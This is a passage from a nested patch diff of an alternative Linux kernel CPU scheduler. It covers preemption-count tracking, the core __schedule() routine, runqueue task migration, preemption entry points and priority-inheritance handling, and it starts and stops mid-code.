-+	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	cancel_delayed_work_sync(&twork->work);
-+}
-+#endif /* CONFIG_HOTPLUG_CPU */
-+
-+int __init sched_tick_offload_init(void)
-+{
-+	tick_work_cpu = alloc_percpu(struct tick_work);
-+	BUG_ON(!tick_work_cpu);
-+	return 0;
-+}
-+
-+#else /* !CONFIG_NO_HZ_FULL */
-+static inline void sched_tick_start(int cpu) { }
-+static inline void sched_tick_stop(int cpu) { }
-+#endif
-+
-+#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
-+				defined(CONFIG_PREEMPT_TRACER))
-+/*
-+ * If the value passed in is equal to the current preempt count
-+ * then we just disabled preemption. Start timing the latency.
-+ */
-+static inline void preempt_latency_start(int val)
-+{
-+	if (preempt_count() == val) {
-+		unsigned long ip = get_lock_parent_ip();
-+#ifdef CONFIG_DEBUG_PREEMPT
-+		current->preempt_disable_ip = ip;
-+#endif
-+		trace_preempt_off(CALLER_ADDR0, ip);
-+	}
-+}
-+
-+void preempt_count_add(int val)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Underflow?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
-+		return;
-+#endif
-+	__preempt_count_add(val);
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Spinlock count overflowing soon?
-+	 */
-+	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
-+				PREEMPT_MASK - 10);
-+#endif
-+	preempt_latency_start(val);
-+}
-+EXPORT_SYMBOL(preempt_count_add);
-+NOKPROBE_SYMBOL(preempt_count_add);
-+
-+/*
-+ * If the value passed in equals the current preempt count
-+ * then we just enabled preemption. Stop timing the latency.
-+ */
-+static inline void preempt_latency_stop(int val)
-+{
-+	if (preempt_count() == val)
-+		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
-+}
-+
-+void preempt_count_sub(int val)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Underflow?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
-+		return;
-+	/*
-+	 * Is the spinlock portion underflowing?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
-+			!(preempt_count() & PREEMPT_MASK)))
-+		return;
-+#endif
-+
-+	preempt_latency_stop(val);
-+	__preempt_count_sub(val);
-+}
-+EXPORT_SYMBOL(preempt_count_sub);
-+NOKPROBE_SYMBOL(preempt_count_sub);
-+
-+#else
-+static inline void preempt_latency_start(int val) { }
-+static inline void preempt_latency_stop(int val) { }
-+#endif
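-+
-+/*
-+ * Worked example (illustrative): with latency tracking enabled, a plain
-+ *
-+ *	preempt_disable();	// count 0 -> 1: preempt_latency_start(1)
-+ *	...			// timed preemption-off window
-+ *	preempt_enable();	// count 1 -> 0: preempt_latency_stop(1)
-+ *
-+ * brackets exactly one preemption-disabled window; nested disables do not
-+ * restart the timing because preempt_count() no longer equals val.
-+ */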
-+
-+static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	return p->preempt_disable_ip;
-+#else
-+	return 0;
-+#endif
-+}
-+
-+/*
-+ * Print scheduling while atomic bug:
-+ */
-+static noinline void __schedule_bug(struct task_struct *prev)
-+{
-+	/* Save this before calling printk(), since that will clobber it */
-+	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
-+
-+	if (oops_in_progress)
-+		return;
-+
-+	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
-+		prev->comm, prev->pid, preempt_count());
-+
-+	debug_show_held_locks(prev);
-+	print_modules();
-+	if (irqs_disabled())
-+		print_irqtrace_events(prev);
-+	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)
-+	    && in_atomic_preempt_off()) {
-+		pr_err("Preemption disabled at:");
-+		print_ip_sym(KERN_ERR, preempt_disable_ip);
-+	}
-+	if (panic_on_warn)
-+		panic("scheduling while atomic\n");
-+
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+
-+/*
-+ * Various schedule()-time debugging checks and statistics:
-+ */
-+static inline void schedule_debug(struct task_struct *prev, bool preempt)
-+{
-+#ifdef CONFIG_SCHED_STACK_END_CHECK
-+	if (task_stack_end_corrupted(prev))
-+		panic("corrupted stack end detected inside scheduler\n");
-+
-+	if (task_scs_end_corrupted(prev))
-+		panic("corrupted shadow stack detected inside scheduler\n");
-+#endif
-+
-+#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
-+	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
-+		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
-+			prev->comm, prev->pid, prev->non_block_count);
-+		dump_stack();
-+		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+	}
-+#endif
-+
-+	if (unlikely(in_atomic_preempt_off())) {
-+		__schedule_bug(prev);
-+		preempt_count_set(PREEMPT_DISABLED);
-+	}
-+	rcu_sleep_check();
-+	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
-+
-+	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
-+
-+	schedstat_inc(this_rq()->sched_count);
-+}
-+
-+/*
-+ * Compile time debug macro
-+ * #define ALT_SCHED_DEBUG
-+ */
-+
-+#ifdef ALT_SCHED_DEBUG
-+void alt_sched_debug(void)
-+{
-+	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
-+	       sched_rq_pending_mask.bits[0],
-+	       sched_idle_mask->bits[0],
-+	       sched_sg_idle_mask.bits[0]);
-+}
-+#else
-+inline void alt_sched_debug(void) {}
-+#endif
-+
-+#ifdef	CONFIG_SMP
-+
-+#ifdef CONFIG_PREEMPT_RT
-+#define SCHED_NR_MIGRATE_BREAK 8
-+#else
-+#define SCHED_NR_MIGRATE_BREAK 32
-+#endif
-+
-+const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
-+
-+/*
-+ * Migrate pending tasks in @rq to @dest_cpu
-+ */
-+static inline int
-+migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
-+{
-+	struct task_struct *p, *skip = rq->curr;
-+	int nr_migrated = 0;
-+	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
-+
-+	while (skip != rq->idle && nr_tries &&
-+	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
-+		skip = sched_rq_next_task(p, rq);
-+		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
-+			__SCHED_DEQUEUE_TASK(p, rq, 0);
-+			set_task_cpu(p, dest_cpu);
-+			sched_task_sanity_check(p, dest_rq);
-+			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
-+			nr_migrated++;
-+		}
-+		nr_tries--;
-+	}
-+
-+	return nr_migrated;
-+}
-+
-+static inline int take_other_rq_tasks(struct rq *rq, int cpu)
-+{
-+	struct cpumask *topo_mask, *end_mask;
-+
-+	if (unlikely(!rq->online))
-+		return 0;
-+
-+	if (cpumask_empty(&sched_rq_pending_mask))
-+		return 0;
-+
-+	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
-+	do {
-+		int i;
-+		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
-+			int nr_migrated;
-+			struct rq *src_rq;
-+
-+			src_rq = cpu_rq(i);
-+			if (!do_raw_spin_trylock(&src_rq->lock))
-+				continue;
-+			spin_acquire(&src_rq->lock.dep_map,
-+				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
-+
-+			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
-+				src_rq->nr_running -= nr_migrated;
-+				if (src_rq->nr_running < 2)
-+					cpumask_clear_cpu(i, &sched_rq_pending_mask);
-+
-+				rq->nr_running += nr_migrated;
-+				if (rq->nr_running > 1)
-+					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
-+
-+				cpufreq_update_util(rq, 0);
-+
-+				spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+				do_raw_spin_unlock(&src_rq->lock);
-+
-+				return 1;
-+			}
-+
-+			spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+			do_raw_spin_unlock(&src_rq->lock);
-+		}
-+	} while (++topo_mask < end_mask);
-+
-+	return 0;
-+}
-+#endif
-+
-+/*
-+ * Timeslices below RESCHED_NS are considered as good as expired as there's no
-+ * point rescheduling when there's so little time left.
-+ */
-+static inline void check_curr(struct task_struct *p, struct rq *rq)
-+{
-+	if (unlikely(rq->idle == p))
-+		return;
-+
-+	update_curr(rq, p);
-+
-+	if (p->time_slice < RESCHED_NS)
-+		time_slice_expired(p, rq);
-+}
-+
-+static inline struct task_struct *
-+choose_next_task(struct rq *rq, int cpu, struct task_struct *prev)
-+{
-+	struct task_struct *next;
-+
-+	if (unlikely(rq->skip)) {
-+		next = rq_runnable_task(rq);
-+		if (next == rq->idle) {
-+#ifdef	CONFIG_SMP
-+			if (!take_other_rq_tasks(rq, cpu)) {
-+#endif
-+				rq->skip = NULL;
-+				schedstat_inc(rq->sched_goidle);
-+				return next;
-+#ifdef	CONFIG_SMP
-+			}
-+			next = rq_runnable_task(rq);
-+#endif
-+		}
-+		rq->skip = NULL;
-+#ifdef CONFIG_HIGH_RES_TIMERS
-+		hrtick_start(rq, next->time_slice);
-+#endif
-+		return next;
-+	}
-+
-+	next = sched_rq_first_task(rq);
-+	if (next == rq->idle) {
-+#ifdef	CONFIG_SMP
-+		if (!take_other_rq_tasks(rq, cpu)) {
-+#endif
-+			schedstat_inc(rq->sched_goidle);
-+			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
-+			return next;
-+#ifdef	CONFIG_SMP
-+		}
-+		next = sched_rq_first_task(rq);
-+#endif
-+	}
-+#ifdef CONFIG_HIGH_RES_TIMERS
-+	hrtick_start(rq, next->time_slice);
-+#endif
-+	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
-+	 * next);*/
-+	return next;
-+}
-+
-+/*
-+ * Constants for the sched_mode argument of __schedule().
-+ *
-+ * The mode argument allows RT enabled kernels to differentiate a
-+ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
-+ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
-+ * optimize the AND operation out and just check for zero.
-+ */
-+#define SM_NONE			0x0
-+#define SM_PREEMPT		0x1
-+#define SM_RTLOCK_WAIT		0x2
-+
-+#ifndef CONFIG_PREEMPT_RT
-+# define SM_MASK_PREEMPT	(~0U)
-+#else
-+# define SM_MASK_PREEMPT	SM_PREEMPT
-+#endif
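-+
-+/*
-+ * Worked example (illustrative): on !PREEMPT_RT, SM_MASK_PREEMPT is ~0U,
-+ * so "sched_mode & SM_MASK_PREEMPT" reduces to "sched_mode != 0" and the
-+ * compiler can drop the AND. On PREEMPT_RT it is SM_PREEMPT, so an
-+ * SM_RTLOCK_WAIT block on a sleeping spin/rwlock is not treated as a
-+ * preemption and the task may be deactivated like any other sleeper.
-+ */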
-+
-+/*
-+ * schedule() is the main scheduler function.
-+ *
-+ * The main means of driving the scheduler and thus entering this function are:
-+ *
-+ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
-+ *
-+ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
-+ *      paths. For example, see arch/x86/entry_64.S.
-+ *
-+ *      To drive preemption between tasks, the scheduler sets the flag in timer
-+ *      interrupt handler scheduler_tick().
-+ *
-+ *   3. Wakeups don't really cause entry into schedule(). They add a
-+ *      task to the run-queue and that's it.
-+ *
-+ *      Now, if the new task added to the run-queue preempts the current
-+ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
-+ *      called on the nearest possible occasion:
-+ *
-+ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
-+ *
-+ *         - in syscall or exception context, at the next outermost
-+ *           preempt_enable(). (this might be as soon as the wake_up()'s
-+ *           spin_unlock()!)
-+ *
-+ *         - in IRQ context, return from interrupt-handler to
-+ *           preemptible context
-+ *
-+ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
-+ *         then at the next:
-+ *
-+ *          - cond_resched() call
-+ *          - explicit schedule() call
-+ *          - return from syscall or exception to user-space
-+ *          - return from interrupt-handler to user-space
-+ *
-+ * WARNING: must be called with preemption disabled!
-+ */
-+static void __sched notrace __schedule(unsigned int sched_mode)
-+{
-+	struct task_struct *prev, *next;
-+	unsigned long *switch_count;
-+	unsigned long prev_state;
-+	struct rq *rq;
-+	int cpu;
-+	int deactivated = 0;
-+
-+	cpu = smp_processor_id();
-+	rq = cpu_rq(cpu);
-+	prev = rq->curr;
-+
-+	schedule_debug(prev, !!sched_mode);
-+
-+	/* bypass sched_feat(HRTICK) checking, which Alt schedule FW doesn't support */
-+	hrtick_clear(rq);
-+
-+	local_irq_disable();
-+	rcu_note_context_switch(!!sched_mode);
-+
-+	/*
-+	 * Make sure that signal_pending_state()->signal_pending() below
-+	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
-+	 * done by the caller to avoid the race with signal_wake_up():
-+	 *
-+	 * __set_current_state(@state)		signal_wake_up()
-+	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
-+	 *					  wake_up_state(p, state)
-+	 *   LOCK rq->lock			    LOCK p->pi_state
-+	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
-+	 *     if (signal_pending_state())	    if (p->state & @state)
-+	 *
-+	 * Also, the membarrier system call requires a full memory barrier
-+	 * after coming from user-space, before storing to rq->curr.
-+	 */
-+	raw_spin_lock(&rq->lock);
-+	smp_mb__after_spinlock();
-+
-+	update_rq_clock(rq);
-+
-+	switch_count = &prev->nivcsw;
-+	/*
-+	 * We must load prev->state once (task_struct::state is volatile), such
-+	 * that we form a control dependency vs deactivate_task() below.
-+	 */
-+	prev_state = READ_ONCE(prev->__state);
-+	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
-+		if (signal_pending_state(prev_state, prev)) {
-+			WRITE_ONCE(prev->__state, TASK_RUNNING);
-+		} else {
-+			prev->sched_contributes_to_load =
-+				(prev_state & TASK_UNINTERRUPTIBLE) &&
-+				!(prev_state & TASK_NOLOAD) &&
-+				!(prev->flags & TASK_FROZEN);
-+
-+			if (prev->sched_contributes_to_load)
-+				rq->nr_uninterruptible++;
-+
-+			/*
-+			 * __schedule()			ttwu()
-+			 *   prev_state = prev->state;    if (p->on_rq && ...)
-+			 *   if (prev_state)		    goto out;
-+			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
-+			 *				  p->state = TASK_WAKING
-+			 *
-+			 * Where __schedule() and ttwu() have matching control dependencies.
-+			 *
-+			 * After this, schedule() must not care about p->state any more.
-+			 */
-+			sched_task_deactivate(prev, rq);
-+			deactivate_task(prev, rq);
-+			deactivated = 1;
-+
-+			if (prev->in_iowait) {
-+				atomic_inc(&rq->nr_iowait);
-+				delayacct_blkio_start();
-+			}
-+		}
-+		switch_count = &prev->nvcsw;
-+	}
-+
-+	check_curr(prev, rq);
-+
-+	next = choose_next_task(rq, cpu, prev);
-+	clear_tsk_need_resched(prev);
-+	clear_preempt_need_resched();
-+#ifdef CONFIG_SCHED_DEBUG
-+	rq->last_seen_need_resched_ns = 0;
-+#endif
-+
-+	if (likely(prev != next)) {
-+		if (deactivated)
-+			update_sched_preempt_mask(rq);
-+		next->last_ran = rq->clock_task;
-+		rq->last_ts_switch = rq->clock;
-+
-+		rq->nr_switches++;
-+		/*
-+		 * RCU users of rcu_dereference(rq->curr) may not see
-+		 * changes to task_struct made by pick_next_task().
-+		 */
-+		RCU_INIT_POINTER(rq->curr, next);
-+		/*
-+		 * The membarrier system call requires each architecture
-+		 * to have a full memory barrier after updating
-+		 * rq->curr, before returning to user-space.
-+		 *
-+		 * Here are the schemes providing that barrier on the
-+		 * various architectures:
-+		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
-+		 *   switch_mm() rely on membarrier_arch_switch_mm() on PowerPC.
-+		 * - finish_lock_switch() for weakly-ordered
-+		 *   architectures where spin_unlock is a full barrier,
-+		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
-+		 *   is a RELEASE barrier),
-+		 */
-+		++*switch_count;
-+
-+		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
-+
-+		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
-+
-+		/* Also unlocks the rq: */
-+		rq = context_switch(rq, prev, next);
-+	} else {
-+		__balance_callbacks(rq);
-+		raw_spin_unlock_irq(&rq->lock);
-+	}
-+
-+#ifdef CONFIG_SCHED_SMT
-+	sg_balance(rq);
-+#endif
-+}
-+
-+void __noreturn do_task_dead(void)
-+{
-+	/* Causes final put_task_struct in finish_task_switch(): */
-+	set_special_state(TASK_DEAD);
-+
-+	/* Tell freezer to ignore us: */
-+	current->flags |= PF_NOFREEZE;
-+
-+	__schedule(SM_NONE);
-+	BUG();
-+
-+	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
-+	for (;;)
-+		cpu_relax();
-+}
-+
-+static inline void sched_submit_work(struct task_struct *tsk)
-+{
-+	unsigned int task_flags;
-+
-+	if (task_is_running(tsk))
-+		return;
-+
-+	task_flags = tsk->flags;
-+	/*
-+	 * If a worker goes to sleep, notify and ask workqueue whether it
-+	 * wants to wake up a task to maintain concurrency.
-+	 */
-+	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
-+		if (task_flags & PF_WQ_WORKER)
-+			wq_worker_sleeping(tsk);
-+		else
-+			io_wq_worker_sleeping(tsk);
-+	}
-+
-+	/*
-+	 * spinlock and rwlock must not flush block requests.  This will
-+	 * deadlock if the callback attempts to acquire a lock which is
-+	 * already acquired.
-+	 */
-+	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
-+
-+	/*
-+	 * If we are going to sleep and we have plugged IO queued,
-+	 * make sure to submit it to avoid deadlocks.
-+	 */
-+	blk_flush_plug(tsk->plug, true);
-+}
-+
-+static void sched_update_worker(struct task_struct *tsk)
-+{
-+	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
-+		if (tsk->flags & PF_WQ_WORKER)
-+			wq_worker_running(tsk);
-+		else
-+			io_wq_worker_running(tsk);
-+	}
-+}
-+
-+asmlinkage __visible void __sched schedule(void)
-+{
-+	struct task_struct *tsk = current;
-+
-+	sched_submit_work(tsk);
-+	do {
-+		preempt_disable();
-+		__schedule(SM_NONE);
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+	sched_update_worker(tsk);
-+}
-+EXPORT_SYMBOL(schedule);
-+
-+/*
-+ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
-+ * state (i.e. has been scheduled out involuntarily) by making sure that all
-+ * tasks have either left the run queue or have gone into user space.
-+ * As idle tasks do not do either, they must not ever be preempted
-+ * (scheduled out involuntarily).
-+ *
-+ * schedule_idle() is similar to schedule_preempt_disabled() except that it
-+ * never enables preemption because it does not call sched_submit_work().
-+ */
-+void __sched schedule_idle(void)
-+{
-+	/*
-+	 * As this skips calling sched_submit_work(), which the idle task does
-+	 * regardless because that function is a nop when the task is in a
-+	 * TASK_RUNNING state, make sure this isn't used anywhere that the
-+	 * current task can be in any other state. Note, idle is always in the
-+	 * TASK_RUNNING state.
-+	 */
-+	WARN_ON_ONCE(current->__state);
-+	do {
-+		__schedule(SM_NONE);
-+	} while (need_resched());
-+}
-+
-+#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
-+asmlinkage __visible void __sched schedule_user(void)
-+{
-+	/*
-+	 * If we come here after a random call to set_need_resched(),
-+	 * or we have been woken up remotely but the IPI has not yet arrived,
-+	 * we haven't yet exited the RCU idle mode. Do it here manually until
-+	 * we find a better solution.
-+	 *
-+	 * NB: There are buggy callers of this function.  Ideally we
-+	 * should warn if prev_state != CONTEXT_USER, but that will trigger
-+	 * too frequently to make sense yet.
-+	 */
-+	enum ctx_state prev_state = exception_enter();
-+	schedule();
-+	exception_exit(prev_state);
-+}
-+#endif
-+
-+/**
-+ * schedule_preempt_disabled - called with preemption disabled
-+ *
-+ * Returns with preemption disabled. Note: preempt_count must be 1
-+ */
-+void __sched schedule_preempt_disabled(void)
-+{
-+	sched_preempt_enable_no_resched();
-+	schedule();
-+	preempt_disable();
-+}
-+
-+#ifdef CONFIG_PREEMPT_RT
-+void __sched notrace schedule_rtlock(void)
-+{
-+	do {
-+		preempt_disable();
-+		__schedule(SM_RTLOCK_WAIT);
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+}
-+NOKPROBE_SYMBOL(schedule_rtlock);
-+#endif
-+
-+static void __sched notrace preempt_schedule_common(void)
-+{
-+	do {
-+		/*
-+		 * Because the function tracer can trace preempt_count_sub()
-+		 * and it also uses preempt_enable/disable_notrace(), if
-+		 * NEED_RESCHED is set, the preempt_enable_notrace() called
-+		 * by the function tracer will call this function again and
-+		 * cause infinite recursion.
-+		 *
-+		 * Preemption must be disabled here before the function
-+		 * tracer can trace. Break up preempt_disable() into two
-+		 * calls. One to disable preemption without fear of being
-+		 * traced. The other to still record the preemption latency,
-+		 * which can also be traced by the function tracer.
-+		 */
-+		preempt_disable_notrace();
-+		preempt_latency_start(1);
-+		__schedule(SM_PREEMPT);
-+		preempt_latency_stop(1);
-+		preempt_enable_no_resched_notrace();
-+
-+		/*
-+		 * Check again in case we missed a preemption opportunity
-+		 * between schedule and now.
-+		 */
-+	} while (need_resched());
-+}
-+
-+#ifdef CONFIG_PREEMPTION
-+/*
-+ * This is the entry point to schedule() from in-kernel preemption
-+ * off of preempt_enable.
-+ */
-+asmlinkage __visible void __sched notrace preempt_schedule(void)
-+{
-+	/*
-+	 * If there is a non-zero preempt_count or interrupts are disabled,
-+	 * we do not want to preempt the current task. Just return.
-+	 */
-+	if (likely(!preemptible()))
-+		return;
-+
-+	preempt_schedule_common();
-+}
-+NOKPROBE_SYMBOL(preempt_schedule);
-+EXPORT_SYMBOL(preempt_schedule);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#ifndef preempt_schedule_dynamic_enabled
-+#define preempt_schedule_dynamic_enabled	preempt_schedule
-+#define preempt_schedule_dynamic_disabled	NULL
-+#endif
-+DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
-+EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
-+void __sched notrace dynamic_preempt_schedule(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
-+		return;
-+	preempt_schedule();
-+}
-+NOKPROBE_SYMBOL(dynamic_preempt_schedule);
-+EXPORT_SYMBOL(dynamic_preempt_schedule);
-+#endif
-+#endif
-+
-+/**
-+ * preempt_schedule_notrace - preempt_schedule called by tracing
-+ *
-+ * The tracing infrastructure uses preempt_enable_notrace to prevent
-+ * recursion and tracing preempt enabling caused by the tracing
-+ * infrastructure itself. But as tracing can happen in areas coming
-+ * from userspace or just about to enter userspace, a preempt enable
-+ * can occur before user_exit() is called. This will cause the scheduler
-+ * to be called when the system is still in usermode.
-+ *
-+ * To prevent this, the preempt_enable_notrace will use this function
-+ * instead of preempt_schedule() to exit user context if needed before
-+ * calling the scheduler.
-+ */
-+asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
-+{
-+	enum ctx_state prev_ctx;
-+
-+	if (likely(!preemptible()))
-+		return;
-+
-+	do {
-+		/*
-+		 * Because the function tracer can trace preempt_count_sub()
-+		 * and it also uses preempt_enable/disable_notrace(), if
-+		 * NEED_RESCHED is set, the preempt_enable_notrace() called
-+		 * by the function tracer will call this function again and
-+		 * cause infinite recursion.
-+		 *
-+		 * Preemption must be disabled here before the function
-+		 * tracer can trace. Break up preempt_disable() into two
-+		 * calls. One to disable preemption without fear of being
-+		 * traced. The other to still record the preemption latency,
-+		 * which can also be traced by the function tracer.
-+		 */
-+		preempt_disable_notrace();
-+		preempt_latency_start(1);
-+		/*
-+		 * Needs preempt disabled in case user_exit() is traced
-+		 * and the tracer calls preempt_enable_notrace() causing
-+		 * an infinite recursion.
-+		 */
-+		prev_ctx = exception_enter();
-+		__schedule(SM_PREEMPT);
-+		exception_exit(prev_ctx);
-+
-+		preempt_latency_stop(1);
-+		preempt_enable_no_resched_notrace();
-+	} while (need_resched());
-+}
-+EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#ifndef preempt_schedule_notrace_dynamic_enabled
-+#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
-+#define preempt_schedule_notrace_dynamic_disabled	NULL
-+#endif
-+DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
-+EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
-+void __sched notrace dynamic_preempt_schedule_notrace(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
-+		return;
-+	preempt_schedule_notrace();
-+}
-+NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
-+EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
-+#endif
-+#endif
-+
-+#endif /* CONFIG_PREEMPTION */
-+
-+/*
-+ * This is the entry point to schedule() from kernel preemption
-+ * off of irq context.
-+ * Note, that this is called and return with irqs disabled. This will
-+ * protect us against recursive calling from irq.
-+ */
-+asmlinkage __visible void __sched preempt_schedule_irq(void)
-+{
-+	enum ctx_state prev_state;
-+
-+	/* Catch callers which need to be fixed */
-+	BUG_ON(preempt_count() || !irqs_disabled());
-+
-+	prev_state = exception_enter();
-+
-+	do {
-+		preempt_disable();
-+		local_irq_enable();
-+		__schedule(SM_PREEMPT);
-+		local_irq_disable();
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+
-+	exception_exit(prev_state);
-+}
-+
-+int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
-+			  void *key)
-+{
-+	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
-+	return try_to_wake_up(curr->private, mode, wake_flags);
-+}
-+EXPORT_SYMBOL(default_wake_function);
-+
-+static inline void check_task_changed(struct task_struct *p, struct rq *rq)
-+{
-+	int idx;
-+
-+	/* Trigger resched if task sched_prio has been modified. */
-+	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
-+		requeue_task(p, rq, idx);
-+		check_preempt_curr(rq);
-+	}
-+}
-+
-+static void __setscheduler_prio(struct task_struct *p, int prio)
-+{
-+	p->prio = prio;
-+}
-+
-+#ifdef CONFIG_RT_MUTEXES
-+
-+static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
-+{
-+	if (pi_task)
-+		prio = min(prio, pi_task->prio);
-+
-+	return prio;
-+}
-+
-+static inline int rt_effective_prio(struct task_struct *p, int prio)
-+{
-+	struct task_struct *pi_task = rt_mutex_get_top_task(p);
-+
-+	return __rt_effective_prio(pi_task, prio);
-+}
-+
-+/*
-+ * rt_mutex_setprio - set the current priority of a task
-+ * @p: task to boost
-+ * @pi_task: donor task
-+ *
-+ * This function changes the 'effective' priority of a task. It does
-+ * not touch ->normal_prio like __setscheduler().
-+ *
-+ * Used by the rt_mutex code to implement priority inheritance
-+ * logic. Call site only calls if the priority of the task changed.
-+ */
-+void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
-+{
-+	int prio;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	/* XXX used to be waiter->prio, not waiter->task->prio */
-+	prio = __rt_effective_prio(pi_task, p->normal_prio);
-+
-+	/*
-+	 * If nothing changed; bail early.
-+	 */
-+	if (p->pi_top_task == pi_task && prio == p->prio)
-+		return;
-+
-+	rq = __task_access_lock(p, &lock);
-+	/*
-+	 * Set under pi_lock && rq->lock, such that the value can be used under
-+	 * either lock.
-+	 *
-+	 * Note that it takes loads of trickery to make this pointer cache work
-+	 * right. rt_mutex_slowunlock()+rt_mutex_postunlock() work together to
-+	 * ensure a task is de-boosted (pi_task is set to NULL) before the
-+	 * task is allowed to run again (and can exit). This ensures the pointer
-+	 * points to a blocked task -- which guarantees the task is present.
-+	 */
-+	p->pi_top_task = pi_task;
-+
-+	/*
-+	 * For FIFO/RR we only need to set prio, if that matches we're done.
-+	 */
-+	if (prio == p->prio)
-+		goto out_unlock;
-+
-+	/*
-+	 * Idle task boosting is a no-no in general. There is one
-+	 * exception, when PREEMPT_RT and NOHZ is active:
-+	 *
-+	 * The idle task calls get_next_timer_interrupt() and holds
-+	 * the timer wheel base->lock on the CPU and another CPU wants
-+	 * to access the timer (probably to cancel it). We can safely
-+	 * ignore the boosting request, as the idle CPU runs this code
-+	 * with interrupts disabled and will complete the lock
-+	 * protected section without being interrupted. So there is no
-+	 * real need to boost.
-+	 */
-+	if (unlikely(p == rq->idle)) {
-+		WARN_ON(p != rq->curr);
